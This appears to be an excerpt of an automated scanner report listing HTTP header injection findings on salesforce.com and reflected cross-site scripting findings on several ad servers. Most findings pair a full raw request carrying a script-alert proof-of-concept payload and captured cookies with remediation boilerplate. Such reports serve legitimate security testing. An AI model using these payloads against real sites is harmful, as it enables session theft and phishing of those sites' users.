GET /common/assets/thirdparty/pixels/1e04a%0d%0a284c4d986bb?date=101221 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751; fsr.a=1303485890905; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D
The URL has moved to <a href="/common/assets/thirdparty/pixels/1e04a 284c4d986bb/?date=101221">/common/assets/thirdparty/pixels/1e04a 284c4d986bb/?date=101221</a>
The value of REST URL parameter 1 is copied into the Location response header. The payload def3f%0d%0af5e9ff33902 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /def3f%0d%0af5e9ff33902 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]; fsr.a=1303485904836; s_sess=%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B%20s_ppv%3D62%257C0%3B
The value of REST URL parameter 1 is copied into the Location response header. The payload a3ace%0d%0a511c6f03f7c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /a3ace%0d%0a511c6f03f7c?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://burp/show/2 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The URL has moved to <a href="/a3ace 511c6f03f7c/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1">/a3ace 511c6f03f7c/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload 50940%0d%0a4462d617d22 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /platform/50940%0d%0a4462d617d22 HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%7D; fsr.a=1303485892905; mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494
The value of REST URL parameter 3 is copied into the Location response header. The payload 29460%0d%0a27690dcd73b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /platform/data/29460%0d%0a27690dcd73b HTTP/1.1 Host: www.salesforce.com Proxy-Connection: keep-alive Referer: http://www.salesforce.com/platform/210x147_rotatingbanner.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; foresee.analytics=%7B%22rr_domain%22%3A%22www.salesforce.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221303485894523_6640%22%7D; fsr.s={"cp":{"siteLocale":"us","visitorType":"anonymous","segment":"non-customer:us","visitorTypeDetailed":"anonymous:no-trial","visitNumber":1,"previousPage":"SFDC:us:platform"}}; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_sess=%20s_ppv%3D0%3B%20s_ppv_x%3D%3B%20s_cc%3Dtrue%3B%20c16%3Dflash%252010%257C%3B%20nve%3Dnve%3B%20v0%3DExternal%2520Websites%257Cburp%3B%20c22%3DExternal%2520Websites%3B%20v20%3DDirect%2520Landing%3B%20c24%3DExternal%2520Websites%257Cburp%3B%20c40%3DExternal%2520Websites%3B%20c48%3D12751%253A0%253A0%3B%20s_sq%3D%3B; fsr.a=1303485895322
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53524'-alert(1)-'3d614a62ce1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N3493.intergi.com/B5426713.10;sz=53524'-alert(1)-'3d614a62ce1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 828af<script>alert(1)</script>33df1d10383 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserver/vdi/684339828af<script>alert(1)</script>33df1d10383?d=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 HTTP/1.1 Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=uHyDGHbZ&did=10500 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; vsd=0@1@4db0cb91@searchportal.information.com; rb=0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d63"><script>alert(1)</script>ab732276e99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe85d63"><script>alert(1)</script>ab732276e99/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0eb2"><script>alert(1)</script>aac0eaedd2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0f0eb2"><script>alert(1)</script>aac0eaedd2a/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc4e"><script>alert(1)</script>33cec00506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/52053fc4e"><script>alert(1)</script>33cec00506/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 369
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d80c0"><script>alert(1)</script>b217f28c29d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959d80c0"><script>alert(1)</script>b217f28c29d/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede19"><script>alert(1)</script>da26e51db9e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0ede19"><script>alert(1)</script>da26e51db9e/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c230"><script>alert(1)</script>92df9fceeea was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/1706c230"><script>alert(1)</script>92df9fceeea/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c3f"><script>alert(1)</script>68d2fa0cf19 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/170/ADTECH34c3f"><script>alert(1)</script>68d2fa0cf19;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
3.10. http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.intergi.com
Path: /adiframe/3.0/5205/1785959/0/170/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e27a"><script>alert(1)</script>dac7ffab43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]&1e27a"><script>alert(1)</script>dac7ffab43=1 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 372
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96362"><script>alert(1)</script>af6646d0ffc was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]96362"><script>alert(1)</script>af6646d0ffc HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 370
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload aabb5><script>alert(1)</script>bdb618d8812 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205/1785959/0/170/ADTECH;target=aabb5><script>alert(1)</script>bdb618d8812 HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 270
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3109b"><script>alert(1)</script>3efc1e6b184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe3109b"><script>alert(1)</script>3efc1e6b184/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a297"><script>alert(1)</script>e672ef11e74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.05a297"><script>alert(1)</script>e672ef11e74/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 675dd"><script>alert(1)</script>1f1c87414ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5205675dd"><script>alert(1)</script>1f1c87414ca/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group] HTTP/1.1 Host: ads.intergi.com Proxy-Connection: keep-alive Referer: http://www.ubi.com/US/404.aspx?aspxerrorpath=%2fdoubleclick%2fDARTIframe%2Ehtml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CfP=1; JEB2=4DB1980D6E651A440C6EAF39F000ED39
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 371
